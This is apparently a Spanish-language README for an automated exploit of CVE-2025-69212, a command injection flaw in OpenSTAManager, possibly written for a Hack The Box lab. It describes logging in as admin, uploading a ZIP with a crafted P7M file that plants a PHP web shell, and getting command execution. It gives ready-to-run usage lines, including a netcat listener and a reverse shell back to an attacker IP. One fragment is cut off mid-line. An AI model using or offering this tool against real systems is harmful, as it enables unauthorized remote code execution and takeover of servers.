
Exploit automatizado para la inyección de comandos CVE-2025-69212 en OpenSTAManager, con autenticación de administrador, carga de ZIP malicioso y shell inversa o ejecución de comandos.
Un script de exploit totalmente automatizado para CVE-2025-69212, una vulnerabilidad de inyección de comandos en OpenSTAManager. Este script se autentica con credenciales de administrador, implementa un shell web PHP malicioso mediante un archivo P7M manipulado en un archivo ZIP, y proporciona ejecución de comandos o una shell inversa.
invoice.p7m).python3 exploit.py -u <TARGET_URL> -U <USERNAME> -P <PASSWORD> -r <LHOST> <LPORT>
Ejecutar un solo comando:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -c 'id'
Obtener una shell inversa:
# Start your netcat listener in another terminal:
nc -lvnp 4444
# Run the exploit:
python3 exploit.py -u http://support_001.enigma.htb -U admin -P 'Password123' -r 10.10.14.1 4444